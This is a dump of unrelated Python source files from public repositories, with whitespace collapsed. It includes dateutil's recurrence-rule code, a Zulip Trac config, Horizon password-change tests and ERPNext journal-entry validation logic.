24) if div: hour = mod day += div fixday = True filtered = False if ((not byhour or hour in byhour) and (not byminute or minute in byminute)): break timeset = gettimeset(hour, minute, second) elif freq == SECONDLY: if filtered: # Jump to one iteration before next day second += (((86399-(hour*3600+minute*60+second)) //interval)*interval) while True: second += self._interval div, mod = divmod(second, 60) if div: second = mod minute += div div, mod = divmod(minute, 60) if div: minute = mod hour += div div, mod = divmod(hour, 24) if div: hour = mod day += div fixday = True if ((not byhour or hour in byhour) and (not byminute or minute in byminute) and (not bysecond or second in bysecond)): break timeset = gettimeset(hour, minute, second) if fixday and day > 28: daysinmonth = calendar.monthrange(year, month)[1] if day > daysinmonth: while day > daysinmonth: day -= daysinmonth month += 1 if month == 13: month = 1 year += 1 if year > datetime.MAXYEAR: self._len = total return daysinmonth = calendar.monthrange(year, month)[1] ii.rebuild(year, month) class _iterinfo(object): __slots__ = ["rrule", "lastyear", "lastmonth", "yearlen", "nextyearlen", "yearordinal", "yearweekday", "mmask", "mrange", "mdaymask", "nmdaymask", "wdaymask", "wnomask", "nwdaymask", "eastermask"] def __init__(self, rrule): for attr in self.__slots__: setattr(self, attr, None) self.rrule = rrule def rebuild(self, year, month): # Every mask is 7 days longer to handle cross-year weekly periods. rr = self.rrule if year != self.lastyear: self.yearlen = 365+calendar.isleap(year) self.nextyearlen = 365+calendar.isleap(year+1) firstyday = datetime.date(year, 1, 1) self.yearordinal = firstyday.toordinal() self.yearweekday = firstyday.weekday() wday = datetime.date(year, 1, 1).weekday() if self.yearlen == 365: self.mmask = M365MASK self.mdaymask = MDAY365MASK self.nmdaymask = NMDAY365MASK self.wdaymask = WDAYMASK[wday:] self.mrange = M365RANGE else: self.mmask = M366MASK self.mdaymask = MDAY366MASK self.nmdaymask = NMDAY366MASK self.wdaymask = WDAYMASK[wday:] self.mrange = M366RANGE if not rr._byweekno: self.wnomask = None else: self.wnomask = [0]*(self.yearlen+7) #no1wkst = firstwkst = self.wdaymask.index(rr._wkst) no1wkst = firstwkst = (7-self.yearweekday+rr._wkst)%7 if no1wkst >= 4: no1wkst = 0 # Number of days in the year, plus the days we got # from last year. wyearlen = self.yearlen+(self.yearweekday-rr._wkst)%7 else: # Number of days in the year, minus the days we # left in last year. wyearlen = self.yearlen-no1wkst div, mod = divmod(wyearlen, 7) numweeks = div+mod//4 for n in rr._byweekno: if n < 0: n += numweeks+1 if not (0 < n <= numweeks): continue if n > 1: i = no1wkst+(n-1)*7 if no1wkst != firstwkst: i -= 7-firstwkst else: i = no1wkst for j in range(7): self.wnomask[i] = 1 i += 1 if self.wdaymask[i] == rr._wkst: break if 1 in rr._byweekno: # Check week number 1 of next year as well # TODO: Check -numweeks for next year. i = no1wkst+numweeks*7 if no1wkst != firstwkst: i -= 7-firstwkst if i < self.yearlen: # If week starts in next year, we # don't care about it. for j in range(7): self.wnomask[i] = 1 i += 1 if self.wdaymask[i] == rr._wkst: break if no1wkst: # Check last week number of last year as # well. If no1wkst is 0, either the year # started on week start, or week number 1 # got days from last year, so there are no # days from last year's last week number in # this year. if -1 not in rr._byweekno: lyearweekday = datetime.date(year-1,1,1).weekday() lno1wkst = (7-lyearweekday+rr._wkst)%7 lyearlen = 365+calendar.isleap(year-1) if lno1wkst >= 4: lno1wkst = 0 lnumweeks = 52+(lyearlen+ (lyearweekday-rr._wkst)%7)%7//4 else: lnumweeks = 52+(self.yearlen-no1wkst)%7//4 else: lnumweeks = -1 if lnumweeks in rr._byweekno: for i in range(no1wkst): self.wnomask[i] = 1 if (rr._bynweekday and (month != self.lastmonth or year != self.lastyear)): ranges = [] if rr._freq == YEARLY: if rr._bymonth: for month in rr._bymonth: ranges.append(self.mrange[month-1:month+1]) else: ranges = [(0, self.yearlen)] elif rr._freq == MONTHLY: ranges = [self.mrange[month-1:month+1]] if ranges: # Weekly frequency won't get here, so we may not # care about cross-year weekly periods. self.nwdaymask = [0]*self.yearlen for first, last in ranges: last -= 1 for wday, n in rr._bynweekday: if n < 0: i = last+(n+1)*7 i -= (self.wdaymask[i]-wday)%7 else: i = first+(n-1)*7 i += (7-self.wdaymask[i]+wday)%7 if first <= i <= last: self.nwdaymask[i] = 1 if rr._byeaster: self.eastermask = [0]*(self.yearlen+7) eyday = easter.easter(year).toordinal()-self.yearordinal for offset in rr._byeaster: self.eastermask[eyday+offset] = 1 self.lastyear = year self.lastmonth = month def ydayset(self, year, month, day): return range(self.yearlen), 0, self.yearlen def mdayset(self, year, month, day): set = [None]*self.yearlen start, end = self.mrange[month-1:month+1] for i in range(start, end): set[i] = i return set, start, end def wdayset(self, year, month, day): # We need to handle cross-year weeks here. set = [None]*(self.yearlen+7) i = datetime.date(year, month, day).toordinal()-self.yearordinal start = i for j in range(7): set[i] = i i += 1 #if (not (0 <= i < self.yearlen) or # self.wdaymask[i] == self.rrule._wkst): # This will cross the year boundary, if necessary. if self.wdaymask[i] == self.rrule._wkst: break return set, start, i def ddayset(self, year, month, day): set = [None]*self.yearlen i = datetime.date(year, month, day).toordinal()-self.yearordinal set[i] = i return set, i, i+1 def htimeset(self, hour, minute, second): set = [] rr = self.rrule for minute in rr._byminute: for second in rr._bysecond: set.append(datetime.time(hour, minute, second, tzinfo=rr._tzinfo)) set.sort() return set def mtimeset(self, hour, minute, second): set = [] rr = self.rrule for second in rr._bysecond: set.append(datetime.time(hour, minute, second, tzinfo=rr._tzinfo)) set.sort() return set def stimeset(self, hour, minute, second): return (datetime.time(hour, minute, second, tzinfo=self.rrule._tzinfo),) class rruleset(rrulebase): class _genitem: def __init__(self, genlist, gen): try: self.dt = gen() genlist.append(self) except StopIteration: pass self.genlist = genlist self.gen = gen def next(self): try: self.dt = self.gen() except StopIteration: self.genlist.remove(self) def __cmp__(self, other): return cmp(self.dt, other.dt) def __init__(self, cache=False): rrulebase.__init__(self, cache) self._rrule = [] self._rdate = [] self._exrule = [] self._exdate = [] def rrule(self, rrule): self._rrule.append(rrule) def rdate(self, rdate): self._rdate.append(rdate) def exrule(self, exrule): self._exrule.append(exrule) def exdate(self, exdate): self._exdate.append(exdate) def _iter(self): rlist = [] self._rdate.sort() self._genitem(rlist, iter(self._rdate).next) for gen in [iter(x).next for x in self._rrule]: self._genitem(rlist, gen) rlist.sort() exlist = [] self._exdate.sort() self._genitem(exlist, iter(self._exdate).next) for gen in [iter(x).next for x in self._exrule]: self._genitem(exlist, gen) exlist.sort() lastdt = None total = 0 while rlist: ritem = rlist[0] if not lastdt or lastdt != ritem.dt: while exlist and exlist[0] < ritem: exlist[0].next() exlist.sort() if not exlist or ritem != exlist[0]: total += 1 yield ritem.dt lastdt = ritem.dt ritem.next() rlist.sort() self._len = total class _rrulestr: _freq_map = {"YEARLY": YEARLY, "MONTHLY": MONTHLY, "WEEKLY": WEEKLY, "DAILY": DAILY, "HOURLY": HOURLY, "MINUTELY": MINUTELY, "SECONDLY": SECONDLY} _weekday_map = {"MO":0,"TU":1,"WE":2,"TH":3,"FR":4,"SA":5,"SU":6} def _handle_int(self, rrkwargs, name, value, **kwargs): rrkwargs[name.lower()] = int(value) def _handle_int_list(self, rrkwargs, name, value, **kwargs): rrkwargs[name.lower()] = [int(x) for x in value.split(',')] _handle_INTERVAL = _handle_int _handle_COUNT = _handle_int _handle_BYSETPOS = _handle_int_list _handle_BYMONTH = _handle_int_list _handle_BYMONTHDAY = _handle_int_list _handle_BYYEARDAY = _handle_int_list _handle_BYEASTER = _handle_int_list _handle_BYWEEKNO = _handle_int_list _handle_BYHOUR = _handle_int_list _handle_BYMINUTE = _handle_int_list _handle_BYSECOND = _handle_int_list def _handle_FREQ(self, rrkwargs, name, value, **kwargs): rrkwargs["freq"] = self._freq_map[value] def _handle_UNTIL(self, rrkwargs, name, value, **kwargs): global parser if not parser: from dateutil import parser try: rrkwargs["until"] = parser.parse(value, ignoretz=kwargs.get("ignoretz"), tzinfos=kwargs.get("tzinfos")) except ValueError: raise ValueError, "invalid until date" def _handle_WKST(self, rrkwargs, name, value, **kwargs): rrkwargs["wkst"] = self._weekday_map[value] def _handle_BYWEEKDAY(self, rrkwargs, name, value, **kwarsg): l = [] for wday in value.split(','): for i in range(len(wday)): if wday[i] not in '+-0123456789': break n = wday[:i] or None w = wday[i:] if n: n = int(n) l.append(weekdays[self._weekday_map[w]](n)) rrkwargs["byweekday"] = l _handle_BYDAY = _handle_BYWEEKDAY def _parse_rfc_rrule(self, line, dtstart=None, cache=False, ignoretz=False, tzinfos=None): if line.find(':') != -1: name, value = line.split(':') if name != "RRULE": raise ValueError, "unknown parameter name" else: value = line rrkwargs = {} for pair in value.split(';'): name, value = pair.split('=') name = name.upper() value = value.upper() try: getattr(self, "_handle_"+name)(rrkwargs, name, value, ignoretz=ignoretz, tzinfos=tzinfos) except AttributeError: raise ValueError, "unknown parameter '%s'" % name except (KeyError, ValueError): raise ValueError, "invalid '%s': %s" % (name, value) return rrule(dtstart=dtstart, cache=cache, **rrkwargs) def _parse_rfc(self, s, dtstart=None, cache=False, unfold=False, forceset=False, compatible=False, ignoretz=False, tzinfos=None): global parser if compatible: forceset = True unfold = True s = s.upper() if not s.strip(): raise ValueError, "empty string" if unfold: lines = s.splitlines() i = 0 while i < len(lines): line = lines[i].rstrip() if not line: del lines[i] elif i > 0 and line[0] == " ": lines[i-1] += line[1:] del lines[i] else: i += 1 else: lines = s.split() if (not forceset and len(lines) == 1 and (s.find(':') == -1 or s.startswith('RRULE:'))): return self._parse_rfc_rrule(lines[0], cache=cache, dtstart=dtstart, ignoretz=ignoretz, tzinfos=tzinfos) else: rrulevals = [] rdatevals = [] exrulevals = [] exdatevals = [] for line in lines: if not line: continue if line.find(':') == -1: name = "RRULE" value = line else: name, value = line.split(':', 1) parms = name.split(';') if not parms: raise ValueError, "empty property name" name = parms[0] parms = parms[1:] if name == "RRULE": for parm in parms: raise ValueError, "unsupported RRULE parm: "+parm rrulevals.append(value) elif name == "RDATE": for parm in parms: if parm != "VALUE=DATE-TIME": raise ValueError, "unsupported RDATE parm: "+parm rdatevals.append(value) elif name == "EXRULE": for parm in parms: raise ValueError, "unsupported EXRULE parm: "+parm exrulevals.append(value) elif name == "EXDATE": for parm in parms: if parm != "VALUE=DATE-TIME": raise ValueError, "unsupported RDATE parm: "+parm exdatevals.append(value) elif name == "DTSTART": for parm in parms: raise ValueError, "unsupported DTSTART parm: "+parm if not parser: from dateutil import parser dtstart = parser.parse(value, ignoretz=ignoretz, tzinfos=tzinfos) else: raise ValueError, "unsupported property: "+name if (forceset or len(rrulevals) > 1 or rdatevals or exrulevals or exdatevals): if not parser and (rdatevals or exdatevals): from dateutil import parser set = rruleset(cache=cache) for value in rrulevals: set.rrule(self._parse_rfc_rrule(value, dtstart=dtstart, ignoretz=ignoretz, tzinfos=tzinfos)) for value in rdatevals: for datestr in value.split(','): set.rdate(parser.parse(datestr, ignoretz=ignoretz, tzinfos=tzinfos)) for value in exrulevals: set.exrule(self._parse_rfc_rrule(value, dtstart=dtstart, ignoretz=ignoretz, tzinfos=tzinfos)) for value in exdatevals: for datestr in value.split(','): set.exdate(parser.parse(datestr, ignoretz=ignoretz, tzinfos=tzinfos)) if compatible and dtstart: set.rdate(dtstart) return set else: return self._parse_rfc_rrule(rrulevals[0], dtstart=dtstart, cache=cache, ignoretz=ignoretz, tzinfos=tzinfos) def __call__(self, s, **kwargs): return self._parse_rfc(s, **kwargs) rrulestr = _rrulestr() # vim:ts=4:sw=4:et
Qgap/zulip
refs/heads/master
api/integrations/trac/zulip_trac_config.py
121
# -*- coding: utf-8 -*- # # Copyright © 2012 Zulip, Inc. # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. # See zulip_trac.py for installation and configuration instructions # Change these constants to configure the plugin: ZULIP_USER = "trac-bot@example.com" ZULIP_API_KEY = "0123456789abcdef0123456789abcdef" STREAM_FOR_NOTIFICATIONS = "trac" TRAC_BASE_TICKET_URL = "https://trac.example.com/ticket" # Most people find that having every change in Trac result in a # notification is too noisy -- in particular, when someone goes # through recategorizing a bunch of tickets, that can often be noisy # and annoying. We solve this issue by only sending a notification # for changes to the fields listed below. # # Total list of possible fields is: # (priority, milestone, cc, owner, keywords, component, severity, # type, versions, description, resolution, summary, comment) # # The following is the list of fields which can be changed without # triggering a Zulip notification; change these to match your team's # workflow. TRAC_NOTIFY_FIELDS = ["description", "summary", "resolution", "comment", "owner"] ## If properly installed, the Zulip API should be in your import ## path, but if not, set a custom path below ZULIP_API_PATH = None # Set this to your Zulip API server URI ZULIP_SITE = "https://api.zulip.com"
clouserw/zamboni
refs/heads/master
mkt/__init__.py
19
import threading from mkt.constants import (categories, comm, platforms, iarc_mappings, # noqa ratingsbodies) from mkt.constants.applications import * # noqa from mkt.constants.base import * # noqa from mkt.constants.payments import * # noqa from mkt.constants.platforms import * # noqa from mkt.constants.search import * # noqa from mkt.constants.submit import * # noqa # This is used in multiple other files to access logging, do not remove. from mkt.site.log import (_LOG, LOG, LOG_BY_ID, LOG_ADMINS, LOG_EDITORS, # noqa LOG_HIDE_DEVELOPER, LOG_KEEP, LOG_REVIEW_QUEUE, LOG_REVIEW_EMAIL_USER, log) _locals = threading.local() _locals.user = None def get_user(): return getattr(_locals, 'user', None) def set_user(user): _locals.user = user
Daniex/horizon
refs/heads/stable/kilo
openstack_dashboard/dashboards/settings/password/tests.py
26
# Copyright 2013 Centrin Data Systems Ltd. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import django from django.conf import settings from django.core.urlresolvers import reverse from django import http from django.utils.six.moves.urllib.parse import urlsplit # noqa from django.utils import unittest from mox import IsA # noqa from openstack_dashboard import api from openstack_dashboard.test import helpers as test INDEX_URL = reverse('horizon:settings:password:index') class ChangePasswordTests(test.TestCase): @test.create_stubs({api.keystone: ('user_update_own_password', )}) def test_change_password(self): api.keystone.user_update_own_password(IsA(http.HttpRequest), 'oldpwd', 'normalpwd',).AndReturn(None) self.mox.ReplayAll() formData = {'method': 'PasswordForm', 'current_password': 'oldpwd', 'new_password': 'normalpwd', 'confirm_password': 'normalpwd'} res = self.client.post(INDEX_URL, formData) self.assertNoFormErrors(res) def test_change_validation_passwords_not_matching(self): formData = {'method': 'PasswordForm', 'current_password': 'currpasswd', 'new_password': 'testpassword', 'confirm_password': 'doesnotmatch'} res = self.client.post(INDEX_URL, formData) self.assertFormError(res, "form", None, ['Passwords do not match.']) @unittest.skipUnless(django.VERSION[0] >= 1 and django.VERSION[1] >= 6, "'HttpResponseRedirect' object has no attribute " "'url' prior to Django 1.6") @test.create_stubs({api.keystone: ('user_update_own_password', )}) def test_change_password_sets_logout_reason(self): api.keystone.user_update_own_password(IsA(http.HttpRequest), 'oldpwd', 'normalpwd').AndReturn(None) self.mox.ReplayAll() formData = {'method': 'PasswordForm', 'current_password': 'oldpwd', 'new_password': 'normalpwd', 'confirm_password': 'normalpwd'} res = self.client.post(INDEX_URL, formData, follow=False) self.assertRedirectsNoFollow(res, settings.LOGOUT_URL) self.assertIn('logout_reason', res.cookies) self.assertEqual(res.cookies['logout_reason'].value, "Password changed. Please log in again to continue.") scheme, netloc, path, query, fragment = urlsplit(res.url) redirect_response = res.client.get(path, http.QueryDict(query)) self.assertRedirectsNoFollow(redirect_response, settings.LOGIN_URL)
Jorge-Rodriguez/ansible
refs/heads/devel
test/integration/targets/module_utils/module_utils/a/b/c/d/e/f/g/h/__init__.py
298
data = 'abcdefgh'
harikrishnakanchi/jeeves
refs/heads/master
segregator/segregator.py
1
from core.strategies import strategies from grammifier.grammifier import Grammifier from strategist.strategist import Strategist from datetime import datetime from utils.say import say import nltk times = { "morning": xrange(0, 12), "afternoon": xrange(12, 16), "evening": xrange(16, 20), "night": xrange(20, 24) } class Segregator: def __init__(self, sentence): self.words = nltk.word_tokenize(sentence) def check_if_greeting(self): greetings = ['morning', 'afternoon', 'evening', 'night'] casual_greetings =['hello', 'hi','hey'] for greeting in greetings: if greeting in self.words: self.react(greeting) return True for casual_greeting in casual_greetings: if casual_greeting in self.words: self.react_casually(casual_greeting) return True return False def react(self, greeting): time_of_day = datetime.now().hour if time_of_day not in times[greeting]: say("Actually, its...") for key in times.keys(): if time_of_day in times[key]: say("Good %s" % key) break def segregate_and_react(self): if not self.check_if_greeting(): grammifier = Grammifier(self.words) print("Referrer is %s" % grammifier.get_referrer()) mental_state = grammifier.get_stemmed_mental_state() action_type = grammifier.get_action_type() strategist = Strategist(strategies) strategist.get_strategy_for(mental_state, action_type) def react_casually(self, casual_greeting): say(casual_greeting)
ali-salman/Aspose.Slides-for-Java
refs/heads/master
Plugins/Aspose-Slides-Java-for-Jython/asposeslides/WorkingWithShapes/FindShape.py
1
from asposeslides import Settings from com.aspose.slides import Presentation from com.aspose.slides import SaveFormat from com.aspose.slides import XpsOptions class FindShape: def __init__(self): dataDir = Settings.dataDir + 'WorkingWithShapes/FindShape/' # Create an instance of Presentation class pres = Presentation(dataDir + 'demo.pptx') # Get the first slide slide = pres.getSlides().get_Item(0) shape = self.find_shape(slide) print "Shape: " . shape def find_shape(slide, alttext): #Iterating through all shapes inside the slide i = 0 slide_size = slide.getShapes().size() while i < slide_size: # If the alternative text of the slide matches with the required one then return the shape if (slide.getShapes().get_Item(i).getAlternativeText() == alttext): return slide.getShapes().get_Item(i) i+=1 return nil if __name__ == '__main__': FindShape()
Drooids/erpnext
refs/heads/develop
erpnext/accounts/doctype/journal_entry/journal_entry.py
10
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors # License: GNU General Public License v3. See license.txt from __future__ import unicode_literals import frappe from frappe.utils import cstr, flt, fmt_money, formatdate, getdate, date_diff from frappe import msgprint, _, scrub from erpnext.setup.utils import get_company_currency from erpnext.controllers.accounts_controller import AccountsController from erpnext.accounts.utils import get_balance_on class JournalEntry(AccountsController): def __init__(self, arg1, arg2=None): super(JournalEntry, self).__init__(arg1, arg2) def get_feed(self): return self.voucher_type def validate(self): if not self.is_opening: self.is_opening='No' self.clearance_date = None super(JournalEntry, self).validate_date_with_fiscal_year() self.validate_party() self.validate_cheque_info() self.validate_entries_for_advance() self.validate_debit_and_credit() self.validate_against_jv() self.validate_against_sales_invoice() self.validate_against_purchase_invoice() self.set_against_account() self.create_remarks() self.set_print_format_fields() self.validate_against_sales_order() self.validate_against_purchase_order() self.check_due_date() self.validate_expense_claim() self.validate_credit_debit_note() self.validate_empty_accounts_table() self.set_title() def on_submit(self): self.check_credit_limit() self.make_gl_entries() self.update_advance_paid() self.update_expense_claim() def set_title(self): self.title = self.pay_to_recd_from or self.accounts[0].account def update_advance_paid(self): advance_paid = frappe._dict() for d in self.get("accounts"): if d.is_advance: if d.against_sales_order: advance_paid.setdefault("Sales Order", []).append(d.against_sales_order) elif d.against_purchase_order: advance_paid.setdefault("Purchase Order", []).append(d.against_purchase_order) for voucher_type, order_list in advance_paid.items(): for voucher_no in list(set(order_list)): frappe.get_doc(voucher_type, voucher_no).set_total_advance_paid() def on_cancel(self): from erpnext.accounts.utils import remove_against_link_from_jv remove_against_link_from_jv(self.doctype, self.name, "against_jv") self.make_gl_entries(1) self.update_advance_paid() self.update_expense_claim() def validate_party(self): for d in self.get("accounts"): account_type = frappe.db.get_value("Account", d.account, "account_type") if account_type in ["Receivable", "Payable"]: if not (d.party_type and d.party): frappe.throw(_("Row {0}: Party Type and Party is required for Receivable / Payable account {1}").format(d.idx, d.account)) elif d.party_type and d.party: frappe.throw(_("Row {0}: Party Type and Party is only applicable against Receivable / Payable account").format(d.idx)) def check_credit_limit(self): customers = list(set([d.party for d in self.get("accounts") if d.party_type=="Customer" and d.party and flt(d.debit) > 0])) if customers: from erpnext.selling.doctype.customer.customer import check_credit_limit for customer in customers: check_credit_limit(customer, self.company) def check_due_date(self): if self.cheque_date: for d in self.get("accounts"): if d.party_type and d.party and d.get("credit" if d.party_type=="Customer" else "debit") > 0: due_date = None if d.against_invoice: due_date = frappe.db.get_value("Sales Invoice", d.against_invoice, "due_date") elif d.against_voucher: due_date = frappe.db.get_value("Purchase Invoice", d.against_voucher, "due_date") if due_date and getdate(self.cheque_date) > getdate(due_date): diff = date_diff(self.cheque_date, due_date) if diff > 0: msgprint(_("Note: Reference Date exceeds invoice due date by {0} days for {1} {2}") .format(diff, d.party_type, d.party)) def validate_cheque_info(self): if self.voucher_type in ['Bank Entry']: if not self.cheque_no or not self.cheque_date: msgprint(_("Reference No & Reference Date is required for {0}").format(self.voucher_type), raise_exception=1) if self.cheque_date and not self.cheque_no: msgprint(_("Reference No is mandatory if you entered Reference Date"), raise_exception=1) def validate_entries_for_advance(self): for d in self.get('accounts'): if not (d.against_voucher and d.against_invoice and d.against_jv): if (d.party_type == 'Customer' and flt(d.credit) > 0) or \ (d.party_type == 'Supplier' and flt(d.debit) > 0): if not d.is_advance: msgprint(_("Row {0}: Please check 'Is Advance' against Account {1} if this is an advance entry.").format(d.idx, d.account)) elif (d.against_sales_order or d.against_purchase_order) and d.is_advance != "Yes": frappe.throw(_("Row {0}: Payment against Sales/Purchase Order should always be marked as advance").format(d.idx)) def validate_against_jv(self): for d in self.get('accounts'): if d.against_jv: account_root_type = frappe.db.get_value("Account", d.account, "root_type") if account_root_type == "Asset" and flt(d.debit) > 0: frappe.throw(_("For {0}, only credit accounts can be linked against another debit entry") .format(d.account)) elif account_root_type == "Liability" and flt(d.credit) > 0: frappe.throw(_("For {0}, only debit accounts can be linked against another credit entry") .format(d.account)) if d.against_jv == self.name: frappe.throw(_("You can not enter current voucher in 'Against Journal Entry' column")) against_entries = frappe.db.sql("""select * from `tabJournal Entry Account` where account = %s and docstatus = 1 and parent = %s and ifnull(against_jv, '') = '' and ifnull(against_invoice, '') = '' and ifnull(against_voucher, '') = ''""", (d.account, d.against_jv), as_dict=True) if not against_entries: frappe.throw(_("Journal Entry {0} does not have account {1} or already matched against other voucher") .format(d.against_jv, d.account)) else: dr_or_cr = "debit" if d.credit > 0 else "credit" valid = False for jvd in against_entries: if flt(jvd[dr_or_cr]) > 0: valid = True if not valid: frappe.throw(_("Against Journal Entry {0} does not have any unmatched {1} entry") .format(d.against_jv, dr_or_cr)) def validate_against_sales_invoice(self): payment_against_voucher = self.validate_account_in_against_voucher("against_invoice", "Sales Invoice") self.validate_against_invoice_fields("Sales Invoice", payment_against_voucher) def validate_against_purchase_invoice(self): payment_against_voucher = self.validate_account_in_against_voucher("against_voucher", "Purchase Invoice") self.validate_against_invoice_fields("Purchase Invoice", payment_against_voucher) def validate_against_sales_order(self): payment_against_voucher = self.validate_account_in_against_voucher("against_sales_order", "Sales Order") self.validate_against_order_fields("Sales Order", payment_against_voucher) def validate_against_purchase_order(self): payment_against_voucher = self.validate_account_in_against_voucher("against_purchase_order", "Purchase Order") self.validate_against_order_fields("Purchase Order", payment_against_voucher) def validate_account_in_against_voucher(self, against_field, doctype): payment_against_voucher = frappe._dict() field_dict = {'Sales Invoice': ["Customer", "Debit To"], 'Purchase Invoice': ["Supplier", "Credit To"], 'Sales Order': ["Customer"], 'Purchase Order': ["Supplier"] } for d in self.get("accounts"): if d.get(against_field): dr_or_cr = "credit" if against_field in ["against_invoice", "against_sales_order"] \ else "debit" if against_field in ["against_invoice", "against_sales_order"] and flt(d.debit) > 0: frappe.throw(_("Row {0}: Debit entry can not be linked with a {1}").format(d.idx, doctype)) if against_field in ["against_voucher", "against_purchase_order"] and flt(d.credit) > 0: frappe.throw(_("Row {0}: Credit entry can not be linked with a {1}").format(d.idx, doctype)) against_voucher = frappe.db.get_value(doctype, d.get(against_field), [scrub(dt) for dt in field_dict.get(doctype)]) if against_field in ["against_invoice", "against_voucher"]: if (against_voucher[0] !=d.party or against_voucher[1] != d.account): frappe.throw(_("Row {0}: Party / Account does not match with \ Customer / Debit To in {1}").format(d.idx, doctype)) else: payment_against_voucher.setdefault(d.get(against_field), []).append(flt(d.get(dr_or_cr))) if against_field in ["against_sales_order", "against_purchase_order"]: if against_voucher != d.party: frappe.throw(_("Row {0}: {1} {2} does not match with {3}") \ .format(d.idx, d.party_type, d.party, doctype)) elif d.is_advance == "Yes": payment_against_voucher.setdefault(d.get(against_field), []).append(flt(d.get(dr_or_cr))) return payment_against_voucher def validate_against_invoice_fields(self, doctype, payment_against_voucher): for voucher_no, payment_list in payment_against_voucher.items(): voucher_properties = frappe.db.get_value(doctype, voucher_no, ["docstatus", "outstanding_amount"]) if voucher_properties[0] != 1: frappe.throw(_("{0} {1} is not submitted").format(doctype, voucher_no)) if flt(voucher_properties[1]) < flt(sum(payment_list)): frappe.throw(_("Payment against {0} {1} cannot be greater \ than Outstanding Amount {2}").format(doctype, voucher_no, voucher_properties[1])) def validate_against_order_fields(self, doctype, payment_against_voucher): for voucher_no, payment_list in payment_against_voucher.items(): voucher_properties = frappe.db.get_value(doctype, voucher_no, ["docstatus", "per_billed", "status", "advance_paid", "base_grand_total"]) if voucher_properties[0] != 1: frappe.throw(_("{0} {1} is not submitted").format(doctype, voucher_no)) if flt(voucher_properties[1]) >= 100: frappe.throw(_("{0} {1} is fully billed").format(doctype, voucher_no)) if cstr(voucher_properties[2]) == "Stopped": frappe.throw(_("{0} {1} is stopped").format(doctype, voucher_no)) if flt(voucher_properties[4]) < flt(voucher_properties[3]) + flt(sum(payment_list)): frappe.throw(_("Advance paid against {0} {1} cannot be greater \ than Grand Total {2}").format(doctype, voucher_no, voucher_properties[3])) def set_against_account(self): accounts_debited, accounts_credited = [], [] for d in self.get("accounts"): if flt(d.debit > 0): accounts_debited.append(d.party or d.account) if flt(d.credit) > 0: accounts_credited.append(d.party or d.account) for d in self.get("accounts"): if flt(d.debit > 0): d.against_account = ", ".join(list(set(accounts_credited))) if flt(d.credit > 0): d.against_account = ", ".join(list(set(accounts_debited))) def validate_debit_and_credit(self): self.total_debit, self.total_credit, self.difference = 0, 0, 0 for d in self.get("accounts"): if d.debit and d.credit: frappe.throw(_("You cannot credit and debit same account at the same time")) self.total_debit = flt(self.total_debit) + flt(d.debit, self.precision("debit", "accounts")) self.total_credit = flt(self.total_credit) + flt(d.credit, self.precision("credit", "accounts")) self.difference = flt(self.total_debit, self.precision("total_debit")) - \ flt(self.total_credit, self.precision("total_credit")) if self.difference: frappe.throw(_("Total Debit must be equal to Total Credit. The difference is {0}") .format(self.difference)) def create_remarks(self): r = [] if self.cheque_no: if self.cheque_date: r.append(_('Reference #{0} dated {1}').format(self.cheque_no, formatdate(self.cheque_date))) else: msgprint(_("Please enter Reference date"), raise_exception=frappe.MandatoryError) company_currency = get_company_currency(self.company) for d in self.get('accounts'): if d.against_invoice and d.credit: r.append(_("{0} against Sales Invoice {1}").format(fmt_money(flt(d.credit), currency = company_currency), \ d.against_invoice)) if d.against_sales_order and d.credit: r.append(_("{0} against Sales Order {1}").format(fmt_money(flt(d.credit), currency = company_currency), \ d.against_sales_order)) if d.against_voucher and d.debit: bill_no = frappe.db.sql("""select bill_no, bill_date from `tabPurchase Invoice` where name=%s""", d.against_voucher) if bill_no and bill_no[0][0] and bill_no[0][0].lower().strip() \ not in ['na', 'not applicable', 'none']: r.append(_('{0} against Bill {1} dated {2}').format(fmt_money(flt(d.debit), currency=company_currency), bill_no[0][0], bill_no[0][1] and formatdate(bill_no[0][1].strftime('%Y-%m-%d')))) if d.against_purchase_order and d.debit: r.append(_("{0} against Purchase Order {1}").format(fmt_money(flt(d.credit), currency = company_currency), \ d.against_purchase_order)) if self.user_remark: r.append(_("Note: {0}").format(self.user_remark)) if r: self.remark = ("\n").join(r) #User Remarks is not mandatory def set_print_format_fields(self): for d in self.get('accounts'): if d.party_type and d.party: if not self.pay_to_recd_from: self.pay_to_recd_from = frappe.db.get_value(d.party_type, d.party, "customer_name" if d.party_type=="Customer" else "supplier_name") self.set_total_amount(d.debit or d.credit) elif frappe.db.get_value("Account", d.account, "account_type") in ["Bank", "Cash"]: self.set_total_amount(d.debit or d.credit) def set_total_amount(self, amt): company_currency = get_company_currency(self.company) self.total_amount = amt from frappe.utils import money_in_words self.total_amount_in_words = money_in_words(amt, company_currency) def make_gl_entries(self, cancel=0, adv_adj=0): from erpnext.accounts.general_ledger import make_gl_entries gl_map = [] for d in self.get("accounts"): if d.debit or d.credit: gl_map.append( self.get_gl_dict({ "account": d.account, "party_type": d.party_type, "party": d.party, "against": d.against_account, "debit": flt(d.debit, self.precision("debit", "accounts")), "credit": flt(d.credit, self.precision("credit", "accounts")), "against_voucher_type": (("Purchase Invoice" if d.against_voucher else None) or ("Sales Invoice" if d.against_invoice else None) or ("Journal Entry" if d.against_jv else None) or ("Sales Order" if d.against_sales_order else None) or ("Purchase Order" if d.against_purchase_order else None)), 